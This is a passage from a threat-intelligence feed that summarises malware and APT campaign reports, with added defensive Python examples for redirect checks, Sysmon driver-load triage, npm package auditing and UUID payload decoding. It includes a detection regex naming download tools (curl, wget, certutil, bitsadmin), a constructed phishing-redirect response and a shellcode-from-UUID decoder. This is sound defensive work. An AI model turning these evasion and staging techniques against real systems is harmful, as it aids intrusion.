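    """Return (delay_seconds, target_url) for a Refresh header value, or None
    if the value is not a refresh directive at all."""
    m = _REFRESH_RE.match(value)
    if not m:
        return None
    url = m.group("url")
    if url is not None:
        url = url.strip("'\"")
    return float(m.group("delay")), url


def parse_response_head(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP response into its status line and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    status, *lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def classify_refresh(raw_response: str, request_host: str) -> Optional[Dict[str, object]]:
    """Flag responses whose Refresh header sends the browser elsewhere.
    A 200 with a Refresh to another host behaves like a redirect but is not
    a 3xx, so only-Location-following scanners miss the target."""
    status, headers = parse_response_head(raw_response)
    parsed = parse_refresh(headers.get("refresh", ""))
    if not parsed or parsed[1] is None:
        return None
    delay, url = parsed
    target_host = urlsplit(url).hostname  # None for a relative URL
    return {
        "status": status.split(" ", 1)[1] if " " in status else status,
        "delay": delay,
        "url": url,
        "offsite": bool(target_host) and target_host.lower() != request_host.lower(),
    }


# Constructed response (not a real capture): the first hop answers 200 but
# immediately refreshes to a lookalike login page on another host.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Refresh: 0; url=https://login.lookalike.invalid/account/verify#user@victim.invalid\r\n"
    "\r\n"
    "<html><body>Redirecting...</body></html>"
)

if __name__ == "__main__":
    print(classify_refresh(SAMPLE_RESPONSE, "cdn.legit-host.invalid"))
```

When detonating a suspicious URL, treat a `Refresh` target the way you treat a `Location` target: follow it, record it as part of the chain, and apply reputation checks to the final host rather than the first one.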
2024-07-17
Crypto_Users_targets_via_RDPWrapper_and_Tailscale
LOW
+
Intel Source:
Cyble
Intel Name:
Crypto_Users_targets_via_RDPWrapper_and_Tailscale
Date of Scan:
2024-07-17
Impact:
LOW
Summary:
CRIL researchers have uncovered a campaign that starts with a ZIP file containing a malicious shortcut (.lnk) file. When the shortcut runs, it downloads a PowerShell script that gives the attackers RDP access to the victim's system. The attack chain includes PowerShell scripts, batch files, Go-based binaries, and a vulnerable driver known as Terminator. The threat actor uses RDPWrapper and Tailscale to establish private network connections and facilitate remote access. The campaign targets Indian users, particularly those in the cryptocurrency industry, using a fake PDF related to CoinDCX as a lure.
Source: https://cyble.com/blog/new-malware-campaign-abusing-rdpwrapper-and-tailscale-to-target-cryptocurrency-users/
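Both this entry and the Killer Ultra entry above come down to the same detection problem: a signed but abusable driver being loaded to kill security software, which Sysmon records as Event ID 6 (DriverLoad) with the image path, hashes, signer and signature status. The Python below is an added example, not Cyble's or Binary Defense's code: it parses Sysmon Event 6 XML and flags loads from user-writable paths, loads by watched signers, and hashes on a caller-supplied blocklist. The events, the `zam64.sys` path, the "Zemana Ltd." signer string and the hashes are constructed placeholders; the signer and hash lists are this example's assumptions and should be fed from your own vulnerable-driver intelligence.

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"

# User-writable locations a legitimate driver is almost never loaded from.
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")
# Signer substrings to flag; assumed list for this example.
WATCHED_SIGNERS = ("zemana",)


@dataclass
class DriverLoad:
    image: str
    hashes: Dict[str, str]
    signature: str
    signature_status: str
    reasons: List[str] = field(default_factory=list)


def parse_driver_load(event_xml: str) -> Optional[DriverLoad]:
    """Return a DriverLoad for a Sysmon Event ID 6 record, None for other events."""
    root = ET.fromstring(event_xml)
    if root.findtext(f"{NS}System/{NS}EventID") != "6":
        return None
    data = {d.get("Name"): (d.text or "") for d in root.iter(f"{NS}Data")}
    hashes = dict(h.split("=", 1) for h in data.get("Hashes", "").split(",") if "=" in h)
    return DriverLoad(data.get("ImageLoaded", ""), hashes,
                      data.get("Signature", ""), data.get("SignatureStatus", ""))


def assess(load: DriverLoad, blocked_sha256: Set[str]) -> DriverLoad:
    """Attach the reasons a driver load deserves a look. A valid signature is
    not a clean bill of health: BYOVD abuses drivers that are signed but known-vulnerable."""
    image = load.image.lower()
    if any(p in image for p in USER_WRITABLE):
        load.reasons.append("loaded from user-writable path")
    if any(s in load.signature.lower() for s in WATCHED_SIGNERS):
        load.reasons.append(f"watched signer: {load.signature}")
    if load.hashes.get("SHA256", "").lower() in blocked_sha256:
        load.reasons.append("hash on known-vulnerable driver list")
    if load.signature_status.lower() != "valid":
        load.reasons.append(f"signature status {load.signature_status or 'missing'}")
    return load


def triage(events: List[str], blocked_sha256: Set[str]) -> List[DriverLoad]:
    hits: List[DriverLoad] = []
    for xml in events:
        load = parse_driver_load(xml)
        if load and assess(load, blocked_sha256).reasons:
            hits.append(load)
    return hits


def _event(event_id: str, image: str, sha256: str, signer: str, status: str) -> str:
    """Build a constructed Sysmon event in the real schema's shape."""
    return (
        '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
        f'<System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>{event_id}</EventID></System>'
        '<EventData>'
        f'<Data Name="ImageLoaded">{image}</Data>'
        f'<Data Name="Hashes">SHA256={sha256}</Data>'
        '<Data Name="Signed">true</Data>'
        f'<Data Name="Signature">{signer}</Data>'
        f'<Data Name="SignatureStatus">{status}</Data>'
        '</EventData></Event>'
    )


# Constructed events: a staged Zemana driver, a normal Microsoft driver, and a non-driver event.
SAMPLE_EVENTS = [
    _event("6", "C:\\Users\\Public\\zam64.sys", "a" * 64, "Zemana Ltd.", "Valid"),
    _event("6", "C:\\Windows\\System32\\drivers\\ndis.sys", "b" * 64, "Microsoft Windows", "Valid"),
    _event("1", "C:\\Windows\\System32\\cmd.exe", "c" * 64, "Microsoft Windows", "Valid"),
]
BLOCKED_SHA256 = {"a" * 64}  # placeholder blocklist entry

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS, BLOCKED_SHA256):
        print(hit.image, hit.reasons)
```

On a host where the driver is already loaded, the same fields come from `Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=6}`; the point of keying on signer and hash rather than file name is that the tools rename the driver freely but cannot re-sign it.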
2024-07-16
Squarespace_Domains_Vulnerable_to_DNS_Hijacking
LOW
+
Intel Source:
Squarespace
Intel Name:
Squarespace_Domains_Vulnerable_to_DNS_Hijacking
Date of Scan:
2024-07-16
Impact:
LOW
Summary:
Squarespace issued a security advisory on or around July 9, 2024, after an unknown threat actor began compromising domain names registered with Squarespace. All affected domains had recently been migrated to Squarespace from Google Domains. The activity was a coordinated wave of DNS hijacking attacks against decentralized finance (DeFi) cryptocurrency domains registered with the Squarespace registrar, redirecting visitors to phishing sites hosting wallet drainers.
Source: https://github.com/security-alliance/advisories/blob/main/2024-07-squarespace.pdf
2024-07-16
New_Version_of_Beavertail_MacOS_Malware_Identified
LOW
+
Intel Source:
Objective-See
Intel Name:
New_Version_of_Beavertail_MacOS_Malware_Identified
Date of Scan:
2024-07-16
Impact:
LOW
Summary:
Researchers at Objective-See have analyzed new malware from North Korean state-affiliated attackers that poses as a legitimate browser-based video conferencing application and can be used to exfiltrate data from infected Macs.
Source: https://objective-see.org/blog/blog_0x7A.html
2024-07-16
The_New_Noxious_Stealer
LOW
+
Intel Source:
ThreatMon
Intel Name:
The_New_Noxious_Stealer
Date of Scan:
2024-07-16
Impact:
LOW
Summary:
Researchers from ThreatMon have identified Noxious Stealer, an open-source Python stealer available on GitHub that extracts sensitive information from online accounts and victim systems. It targets Discord Nitro users to steal billing details, account tokens, email addresses, and phone numbers, and also collects user data, cookies, browser history, and Wi-Fi network information. It uses evasion techniques to avoid antivirus detection, including on VirusTotal, and can extract wallet addresses and private keys to compromise cryptocurrency wallets.
Source: https://x.com/MonThreat/status/1813159879915229479
2024-07-16
Malicious_NPM_Packages_with_Hidden_Backdoors
LOW
+
Intel Source:
Phylum
Intel Name:
Malicious_NPM_Packages_with_Hidden_Backdoors
Date of Scan:
2024-07-16
Impact:
LOW
Summary:
Phylum researchers have discovered two malicious packages on the npm registry that hide backdoor code to execute commands sent from a remote server. Although the packages appear legitimate at first, Phylum's system flagged them because of their command-and-control functionality, which is concealed in image files and executed during package installation.
Source: https://blog.phylum.io/fake-aws-packages-ship-command-and-control-malware-in-jpeg-files/
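The two things that made these packages dangerous are visible before anything runs: an install-time lifecycle hook in `package.json`, and binary image files in a package that has no business shipping them. The Python below is an added example, not Phylum's scanner or the malicious packages' code: it reads a package manifest and a tarball file listing and reports those heuristics. Both packages, their names and file lists are constructed; `npm pack <name> --dry-run` prints a real package's file list without installing it.

```python
import json
import re
from typing import Dict, List

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
IMAGE_RE = re.compile(r"\.(?:jpe?g|png|gif|bmp|webp)$", re.IGNORECASE)
FETCH_RE = re.compile(r"\b(?:curl|wget|Invoke-WebRequest|iwr|certutil|bitsadmin)\b", re.IGNORECASE)


def audit_package(package_json: str, files: List[str]) -> Dict[str, object]:
    """Heuristic triage of a package before installing it.

    Flags: any install-time lifecycle hook (code runs on `npm install`),
    hooks that download things, and image files shipped alongside such a hook
    (a library rarely needs a JPEG, and it is a convenient place to hide a payload).
    """
    pkg = json.loads(package_json)
    scripts = pkg.get("scripts") or {}
    findings: List[str] = []

    hooks = {h: scripts[h] for h in INSTALL_HOOKS if scripts.get(h)}
    for hook, cmd in hooks.items():
        findings.append(f"{hook} hook runs at install time: {cmd}")
        if FETCH_RE.search(cmd):
            findings.append(f"{hook} hook fetches remote content: {cmd}")

    images = [f for f in files if IMAGE_RE.search(f)]
    if hooks and images:
        findings.append("image files shipped with an install hook: " + ", ".join(images))

    return {"name": pkg.get("name", "?"), "hooks": hooks, "images": images,
            "findings": findings, "suspicious": bool(findings)}


# Constructed packages (names are placeholders, not the packages Phylum reported).
SUSPECT_PKG = json.dumps({
    "name": "example-aws-s3-helper",
    "version": "1.0.3",
    "scripts": {"postinstall": "node ./lib/setup.js"},
})
SUSPECT_FILES = ["package.json", "lib/index.js", "lib/setup.js", "assets/logo.jpg"]

CLEAN_PKG = json.dumps({"name": "example-clean", "version": "2.0.0",
                        "scripts": {"test": "node test.js"}})
CLEAN_FILES = ["package.json", "index.js", "README.md"]

if __name__ == "__main__":
    for pkg, files in ((SUSPECT_PKG, SUSPECT_FILES), (CLEAN_PKG, CLEAN_FILES)):
        print(audit_package(pkg, files))
```

The heuristic is noisy on purpose (plenty of honest packages have a `postinstall`); what it buys you is a short list to read by hand. Installing with `npm install --ignore-scripts` removes the install-time execution path entirely and is a sane default for CI.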
2024-07-16
Social_Engineering_Tactic_to_Deploy_Malware
LOW
+
Intel Source:
McAfee
Intel Name:
Social_Engineering_Tactic_to_Deploy_Malware
Date of Scan:
2024-07-16
Impact:
LOW
Summary:
McAfee researchers have described a malware delivery technique called the ClickFix infection chain. It starts when attackers lure users to legitimate-looking but compromised websites, which display fake pop-ups instructing the user to paste a script into a PowerShell terminal, tricking the user into running the malicious script themselves. Once active, the malware steals personal data and sends it to its C2 server. Lumma Stealer and DarkGate are both being distributed with this technique.
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clickfix-deception-a-social-engineering-tactic-to-deploy-malware/
2024-07-16
The_Investigation_of_TrollAgent_Stealer
LOW
+
Intel Source:
Dark Atlas
Intel Name:
The_Investigation_of_TrollAgent_Stealer
Date of Scan:
2024-07-16
Impact:
LOW
Summary:
Researchers at Dark Atlas have observed that in January 2024 Kimsuky launched a targeted campaign against high-profile targets in South Korea, abusing the digital signatures of established firms such as SGA Solutions and D2innovation to deliver and deploy later stages of the malware. The chain started with an installer that downloaded a Go-written DLL known as TrollAgent, protected by VMProtect 3 and built to steal valuable information.
Source: https://darkatlas.io/blog/kimsuky-apt-the-trollagent-stealer-analysis
2024-07-16
Attacks_With_CVE_2020_15227_Nette_PHP_Framework
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Attacks_With_CVE_2020_15227_Nette_PHP_Framework
Date of Scan:
2024-07-16
Impact:
LOW
Summary:
ISC.SANS researchers have observed several exploit attempts against an older vulnerability in the Nette Framework, CVE-2020-15227, using another variant of the public exploit. Nette is a PHP framework designed to make web application development easier. In 2020, an OS command injection vulnerability in Nette was discovered and patched; as is usually the case with OS command injection, it was easy to exploit, and an exploit was made public not long afterward.
Source: https://isc.sans.edu/diary/rss/31076
2024-07-16
NullBulge_Threat_Actor
LOW
+
Intel Source:
SentinelLabs
Intel Name:
NullBulge_Threat_Actor
Date of Scan:
2024-07-16
Impact:
LOW
Summary:
SentinelLabs researchers have identified a new threat actor group called NullBulge, which targets AI and gaming organizations. NullBulge inserts malicious code into legitimate software distribution channels, using popular platforms such as GitHub, Reddit, and Hugging Face to spread widely. The group uses tools such as AsyncRAT and Xworm to deploy LockBit ransomware, and presents itself as a hacktivist collective while pursuing financial gain.
Source: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
2024-07-16
Beware_of_Malware_Disguised_as_Cracks
LOW
+
Intel Source:
ASEC
Intel Name:
Beware_of_Malware_Disguised_as_Cracks
Date of Scan:
2024-07-16
Impact:
LOW
Summary:
Researchers at ASEC have observed malware disguised as crack programs, such as MS Office cracks. The malware spreads via web downloads and torrents and lets attackers keep control of infected systems through regular updates. The attackers install the malware differently depending on whether AhnLab's V3 security software is present, and use the Task Scheduler for persistence so that it keeps running even if part of it is detected.
Source: https://asec.ahnlab.com/ko/67917/
2024-07-16
Russian_Hacktivists_Target_French_Websites_Ahead_of_Paris_Olympics
LOW
+
Intel Source:
Cyble
Intel Name:
Russian_Hacktivists_Target_French_Websites_Ahead_of_Paris_Olympics
Date of Scan:
2024-07-16
Impact:
LOW
Summary:
On June 23, 2024, Cyble researchers detected a significant cyber threat involving Russian hacktivist groups aiming at French targets in preparation for the upcoming Paris Olympics. The DDoS attack was launched by the People's Cyber Army, which is linked to APT44 (Sandworm, FROZENBARENTS, Seashell Blizzard), together with its ally HackNeT; the groups described it as a training exercise. Cyble notes that this is the first documented case of state-supported Russian hacktivists attacking French digital infrastructure ahead of an international event.
Source: https://cyble.com/blog/hacktivist-groups-peoples-cyber-army-and-hacknet-launch-trial-ddos-attacks-on-french-websites-prior-to-the-onslaught-during-paris-olympics/
2024-07-16
Attack_by_MirrorFace_on_Japanese_Organizations
MEDIUM
+
Intel Source:
JPCERT
Intel Name:
Attack_by_MirrorFace_on_Japanese_Organizations
Date of Scan:
2024-07-16
Impact:
MEDIUM
Summary:
Researchers from JPCERT have been tracking the MirrorFace attack campaigns using the LODEINFO and NOOPDOOR malware since 2022. Originally, the actor's targets were think tanks, universities, political organizations, and the media; starting in 2023, the targets expanded to include manufacturers and research institutions. Regarding TTPs, in addition to their earlier spear-phishing emails, the actor now exploits vulnerabilities in externally exposed assets to gain access to the target's network.
Source: https://blogs.jpcert.or.jp/en/2024/07/mirrorface-attack-against-japanese-organisations.html
2024-07-16
Lazarus_Group_APT_Tracker_With_Validin_DNS_History
MEDIUM
+
Intel Source:
Validin
Intel Name:
Lazarus_Group_APT_Tracker_With_Validin_DNS_History
Date of Scan:
2024-07-16
Impact:
MEDIUM
Summary:
Researchers from Validin have shown how to use historical DNS data with thorough annotations to go beyond established indicators and find current and recent domain names and IP addresses that are very likely connected to the Lazarus Group.
Source: https://www.validin.com/blog/hunting-lazarus-dns-history-host-responses/
2024-07-15
OceanLotus_APT_Attack_Using_Social_Security_Topics
LOW
+
Intel Source:
Knownsec 404 Lab
Intel Name:
OceanLotus_APT_Attack_Using_Social_Security_Topics
Date of Scan:
2024-07-15
Impact:
LOW
Summary:
Knownsec 404 Lab has found an attack sample attributed to the OceanLotus group. The sample uses lures about social security and provident fund adjustments to entice victims to click. It is also highly consistent with findings from 2023 in which OceanLotus imitated APT29 attack activity.
Source: https://mp.weixin.qq.com/s?__biz=MzAxNDY2MTQ2OQ==&mid=2650979391&idx=1&sn=d40b3efc4c0686f73aabbb47f7f61c15&chksm=8079fe0db70e771b503d98cb8bc757a71f78805e6b90483f217c9fa673996245314606c28d3d&scene=178&cur_album_id=1833896270264844290#rd
2024-07-15
Private_HTS_program_is_using_for_attacks
LOW
+
Intel Source:
ASEC
Intel Name:
Private_HTS_program_is_using_for_attacks
Date of Scan:
2024-07-15
Impact:
LOW
Summary:
ASEC researchers have identified malware distributed through a private HTS (home trading system) program called HPlus, in a campaign similar to an earlier one that delivered Quasar RAT; the main difference is that HPlus uses an MSI installer instead of an NSIS installer. The attacker has also added a remote-support function via AnyDesk: when users click the Remote Support button, AnyDesk is launched. After installation, users run a desktop shortcut that launches an updater program, which reads a configuration file, connects to the server, and performs updates over FTP. The attacker manipulates the configuration file to point at an FTP server where the actual malware is hosted, so the malware is downloaded and installed as a compressed file.
Source: https://asec.ahnlab.com/ko/67881/
2024-07-15
VoidBanshee_Targets_Windows_Users
MEDIUM
+
Intel Source:
Trend Micro
Intel Name:
VoidBanshee_Targets_Windows_Users
Date of Scan:
2024-07-15
Impact:
MEDIUM
Summary:
Trend Micro researchers have discovered exploitation of the MSHTML remote code execution vulnerability CVE-2024-38112 by Void Banshee to deliver Atlantida Stealer, which first emerged in January 2024. Void Banshee uses the vulnerability as part of its attack chain to infect victim machines with Atlantida, which collects system information and sensitive data such as passwords and cookies from various applications. Victims are lured with ZIP archives containing malicious files disguised as PDF books, shared through cloud-sharing websites, Discord servers, and online libraries. The attackers target North America, Europe, and Southeast Asia.
Source: https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html
2024-07-15
New_Bugsleep_Backdoor_by_Muddywater
MEDIUM
+
Intel Source:
Checkpoint
Intel Name:
New_Bugsleep_Backdoor_by_Muddywater
Date of Scan:
2024-07-15
Impact:
MEDIUM
Summary:
Check Point researchers have discovered phishing campaigns by MuddyWater, an Iranian threat group active since at least 2017. The attackers use a custom backdoor called BugSleep and abuse Egnyte, a legitimate file-sharing platform, to deliver files through the browser. MuddyWater lures targets with invitations to webinars and online courses and, in its recent campaigns, uses English more often than the targets' local languages. Targeted sectors include municipalities, airlines, travel agencies, and media. Many emails were sent to companies in Israel, with others aimed at entities in Turkey, Saudi Arabia, India, and Portugal.
Source: https://research.checkpoint.com/2024/new-bugsleep-backdoor-deployed-in-recent-muddywater-campaigns/
2024-07-15
Atomic_Stealer_Delivered_by_Fake_Microsoft_Teams
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Atomic_Stealer_Delivered_by_Fake_Microsoft_Teams
Date of Scan:
2024-07-15
Impact:
LOW
Summary:
Malwarebytes researchers have observed increased attacks on the macOS ecosystem in which criminals impersonate popular messaging platforms such as Microsoft Teams to spread malware through deceptive advertisements and fake installers. Recent malvertising campaigns show criminals targeting macOS with more sophisticated tooling and advanced evasion techniques; in this case the fake Teams installer delivers Atomic Stealer.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2024/07/fake-microsoft-teams-for-mac-delivers-atomic-stealer
2024-07-15
New_Phishing_Tactic_Targets_Employees
LOW
+
Intel Source:
Cofense
Intel Name:
New_Phishing_Tactic_Targets_Employees
Date of Scan:
2024-07-15
Impact:
LOW
Summary:
Researchers from Cofense have observed a new phishing tactic in which emails impersonate a company's HR department. The emails arrive with a subject line such as "Modified Employee Handbook for All Employees – Kindly Acknowledge," look legitimate, open with a formal greeting, and mimic corporate communications. Their goal is to get the recipient to click a link and enter login credentials. The attacker uses psychological pressure, such as fear of non-compliance with company policy and the supposed importance of the handbook updates, to push the recipient into clicking the malicious link.
Source: https://cofense.com/blog/beware-of-the-latest-phishing-tactic-targeting-employees/
2024-07-15
VCRuntime_Campaign_via_Malspam_Revenue_Agency
LOW
+
Intel Source:
CERT-AGID
Intel Name:
VCRuntime_Campaign_via_Malspam_Revenue_Agency
Date of Scan:
2024-07-15
Impact:
LOW
Summary:
CERT-AGID researchers have identified an Italian campaign themed around the "Agenzia delle Entrate" (revenue agency). Victims receive a PEC (certified email) with a link to a ZIP file named "Skype". The archive contains an MSI file which, when executed, launches a JAR file. The JAR ships with a key (KEY) and a file containing a long list of UUIDs; these UUIDs hold the encrypted data needed to reconstruct the shellcode that is then run on the machine.
Source: https://x.com/agidcert/status/1809182289072447665?s=12&t=8PuF3QXqo9azqMLbBfcyeA
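Storing a payload as a list of UUID strings is a known evasion trick: each 36-character UUID carries 16 raw bytes, and the loader parses the strings back into memory. The catch for an analyst is byte order: a Windows loader that calls UuidFromStringA gets the first three fields little-endian, while a Java loader that rebuilds the bytes from UUID.fromString's two longs gets the textual (big-endian) order. The Python below is an added example, not CERT-AGID's tooling or the JAR's code: it pulls UUIDs out of a dumped listing and reassembles the bytes in either layout. The "shellcode" is a constructed marker, and the key-based decryption step the summary mentions is not modeled because the page does not say which algorithm the JAR uses.

```python
import re
import uuid
from typing import Iterable, List

UUID_RE = re.compile(r"[0-9a-fA-F]{8}-(?:[0-9a-fA-F]{4}-){3}[0-9a-fA-F]{12}")


def bytes_to_uuids(data: bytes) -> List[str]:
    """Encoder (used here only to build a test vector): pack 16-byte chunks in
    the layout UuidFromStringA produces when it parses the text back,
    i.e. the first three fields little-endian. Zero-pads the last chunk."""
    padded = data + b"\x00" * (-len(data) % 16)
    return [str(uuid.UUID(bytes_le=padded[i:i + 16])) for i in range(0, len(padded), 16)]


def uuids_to_bytes(uuids: Iterable[str], little_endian: bool = True) -> bytes:
    """Decode a UUID list back into raw bytes.

    little_endian=True reproduces the in-memory layout a Windows loader gets
    from UuidFromStringA; False gives the plain textual order a Java loader sees
    when it writes getMostSignificantBits/getLeastSignificantBits big-endian.
    Try both when the loader is unknown: only one yields a sane payload.
    """
    out = bytearray()
    for s in uuids:
        u = uuid.UUID(s.strip().strip('",\';'))
        out += u.bytes_le if little_endian else u.bytes
    return bytes(out)


def extract_uuids(text: str) -> List[str]:
    """Pull UUID-looking tokens, in order, out of a dumped resource or source listing."""
    return UUID_RE.findall(text)


# Constructed stand-in: a readable marker instead of real shellcode.
STAND_IN = b"STANDIN-SHELLCODE-BYTES:\x90\x90\xcc"


def demo() -> bytes:
    """Round trip through a Java-array-looking listing. The rstrip only removes
    the encoder's zero padding; real shellcode that ends in NUL bytes would
    need the original length instead."""
    listing = "\n".join(f'    "{u}",' for u in bytes_to_uuids(STAND_IN))
    return uuids_to_bytes(extract_uuids(listing)).rstrip(b"\x00")


if __name__ == "__main__":
    print(demo())
```

A quick way to pick the right layout on a real sample is to decode both ways and look for recognisable prologue bytes or a known decryption-key position; the wrong layout scrambles every 16-byte block in the same pattern, so it is easy to spot once you know to look.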
2024-07-15
Chinese_Hacking_Group_Targeting_Italy
MEDIUM
+
Intel Source:
TG Soft
Intel Name:
Chinese_Hacking_Group_Targeting_Italy
Date of Scan:
2024-07-15
Impact:
MEDIUM
Summary:
Researchers at TG Soft discovered two targeted attacks against Italian companies and government entities, attributed to a Chinese cyber actor connected to APT17, also known as DeputyDog. The attacks use variants of the 9002 RAT; one campaign used an Office document while the other used a decoy link. In both cases the aim was to trick victims into downloading what looked like a Skype for Business package from a domain that appeared to belong to an Italian government entity.
Source: https://www.tgsoft.it/news/news_archivio.asp?id=1557&lang=eng
2024-07-15
Volt_Typhoon_Targeting_US_Congress_and_Taxpayers
MEDIUM
+
Intel Source:
CVERC
Intel Name:
Volt_Typhoon_Targeting_US_Congress_and_Taxpayers
Date of Scan:
2024-07-15
Impact:
MEDIUM
Summary:
China's National Computer Virus Emergency Response Center (CVERC) has published a report on Volt Typhoon accusing U.S. government agencies of fabricating the Volt Typhoon narrative to secure funding and preserve surveillance powers. The report claims that mainstream US media outlets have stayed silent about evidence that disinformation was used to obtain increased appropriations and to legitimize far-reaching FISA Section 702 surveillance, and that the campaign was designed to eliminate foreign competition and sustain American dominance of cyberspace.
Source: https://www.cverc.org.cn/head/zhaiyao/futetaifengerEN.pdf
2024-07-15
New_Jellyfish_Loader
LOW
+
Intel Source:
Cyble
Intel Name:
New_Jellyfish_Loader
Date of Scan:
2024-07-15
Impact:
LOW
Summary:
CRIL researchers have identified new malware called Jellyfish Loader. The loader uses Fody and Costura to embed its dependencies and relies on asynchronous methods for execution. It collects basic system information from the infected host, stores it in JSON format, and sends it to the C2 server, performing SSL certificate validation before communicating. The C2 server then returns shellcode to the victim's machine for further malicious activity.
Source: https://cyble.com/blog/investigating-the-new-jellyfish-loader/
2024-07-12
MoonWalk_an_Exploring_APT41_Updated_Arsenal
LOW
+
Intel Source:
Zscaler
Intel Name:
MoonWalk_an_Exploring_APT41_Updated_Arsenal
Date of Scan:
2024-07-12
Impact:
LOW
Summary:
Zscaler researchers have investigated the MoonWalk backdoor, a recent addition to APT41's toolkit. MoonWalk uses many evasion techniques: it relies on Google Drive for command-and-control (C2) communication and abuses Windows Fibers, a little-used Windows feature, to evade anti-virus (AV) and endpoint detection and response (EDR) solutions.
Source: https://www.zscaler.com/blogs/security-research/moonwalk-deep-dive-updated-arsenal-apt41-part-2
2024-07-12
Braodo_Info_Stealer_Targeting_Vietnam_and_Abroad
LOW
+
Intel Source:
Cyfirma
Intel Name:
Braodo_Info_Stealer_Targeting_Vietnam_and_Abroad
Date of Scan:
2024-07-12
Impact:
LOW
Summary:
Researchers at Cyfirma have discovered Braodo Stealer, a Python-based malware active since early 2024 that mainly targets users in Vietnam, with other victims in the United States, Czechia, Germany, the Netherlands, Singapore, and the United Kingdom. It spreads via phishing and spear-phishing emails.
Source: https://www.cyfirma.com/research/braodo-info-stealer-targeting-vietnam-and-abroad/
2024-07-12
Malware_Targeting_Browser_Data_with_Python_Basis
LOW
+
Intel Source:
DocGuard
Intel Name:
Malware_Targeting_Browser_Data_with_Python_Basis
Date of Scan:
2024-07-12
Impact:
LOW
Summary:
Researchers from DocGuard have discovered a Python-based stealer spreading through Word documents. Once installed on a compromised computer, it obtains the device's IP address and sends the user's browser data to a country-specific command-and-control (C2) server.
Source: https://www.docguard.io/analysis-of-malicious-word-document-python-based-malware-targeting-browser-data/
2024-07-12
A_Stealer_Tool_Named_Serpantis_Stealer
LOW
+
Intel Source:
ThreatMon
Intel Name:
A_Stealer_Tool_Named_Serpantis_Stealer
Date of Scan:
2024-07-12
Impact:
LOW
Summary:
Researchers at ThreatMon have discovered Serpantis Stealer, an open-source stealer written in Python and available on GitHub. The tool poses a serious threat through its wide range of capabilities: displaying fake error messages to mislead users, capturing screenshots of all connected monitors, extracting saved passwords from web browsers and Wi-Fi profiles, creating a mutex to prevent multiple instances from running at once, monitoring and reporting token, password, and email changes after login, and more.
Source: https://x.com/monthreat/status/1811432802308559095?s=12&t=8PuF3QXqo9azqMLbBfcyeA
2024-07-12
Shadowroot_Ransomware
MEDIUM
+
Intel Source:
Forcepoint
Intel Name:
Shadowroot_Ransomware
Date of Scan:
2024-07-12
Impact:
MEDIUM
Summary:
Forcepoint's X-Labs team has discovered ShadowRoot, a ransomware targeting Turkish businesses through phishing emails whose malicious PDF attachments link to a malicious domain. When the recipient clicks the embedded link, an executable is downloaded that encrypts files and appends a ".shadowroot" extension. The malware performs various stealthy actions, including downloading additional binaries, executing obfuscated code, and running PowerShell commands. A ransom note is left on the victim's desktop instructing them to contact the attackers via email for decryption.
Source: https://www.forcepoint.com/blog/x-labs/shadowroot-ransomware-targeting-turkish-businesses
2024-07-12
PurpleFox_Malware_Activities
LOW
+
Intel Source:
X (Twitter)
Intel Name:
PurpleFox_Malware_Activities
Date of Scan:
2024-07-12
Impact:
LOW
Summary:
Security researcher vm001cn reported on X (Twitter) a PurpleFox sample carrying a valid signature. Purple Fox downloads and runs its payload through the MsiInstallProductA function in msi.dll. The payload is an .msi file containing 32- and 64-bit encrypted shellcode. After it runs, the system restarts and the malware's components are renamed through the 'PendingFileRenameOperations' registry value.
Source: https://x.com/vm001cn/status/1809909869883072703?s=12&t=8PuF3QXqo9azqMLbBfcyeA
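PendingFileRenameOperations is a REG_MULTI_SZ under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager that the Session Manager processes at boot: consecutive (source, destination) pairs in NT path form, where an empty destination deletes the source and a leading "!" on the destination means replace-existing. Malware uses it to move staged files into place before any user-mode security product is running. The Python below is an added example, not code from the researcher's post or from PurpleFox: it parses the value's string list and flags moves from staging locations into system directories. The value contents are constructed, and the directory lists are this example's assumptions.

```python
from dataclasses import dataclass
from typing import List, Optional

NT_PREFIX = "\\??\\"
# Staging locations a boot-time move into a system directory should not come
# from, and the system directories worth watching. Both lists are assumptions.
STAGING_DIRS = ("\\temp\\", "\\appdata\\", "\\users\\public\\", "\\programdata\\")
SYSTEM_DIRS = ("\\windows\\system32\\", "\\windows\\syswow64\\")


@dataclass
class RenameOp:
    source: str
    destination: Optional[str]   # None: the source is deleted at boot
    replace_existing: bool       # destination carried the "!" prefix


def _strip_nt(path: str) -> str:
    return path[len(NT_PREFIX):] if path.startswith(NT_PREFIX) else path


def parse_pending_renames(values: List[str]) -> List[RenameOp]:
    """Turn the REG_MULTI_SZ string list into rename/delete operations."""
    if len(values) % 2:
        raise ValueError("expected source/destination pairs")
    ops: List[RenameOp] = []
    for src, dst in zip(values[0::2], values[1::2]):
        replace = dst.startswith("!")
        if replace:
            dst = dst[1:]
        ops.append(RenameOp(_strip_nt(src), _strip_nt(dst) or None, replace))
    return ops


def suspicious_ops(ops: List[RenameOp]) -> List[RenameOp]:
    """Flag moves from staging locations into system directories and
    boot-time deletions of files that live under system directories."""
    flagged: List[RenameOp] = []
    for op in ops:
        src = op.source.lower()
        dst = (op.destination or "").lower()
        if op.destination is not None:
            if any(s in src for s in STAGING_DIRS) and any(d in dst for d in SYSTEM_DIRS):
                flagged.append(op)
        elif any(d in src for d in SYSTEM_DIRS):
            flagged.append(op)
    return flagged


# Constructed value contents (not taken from a real PurpleFox sample):
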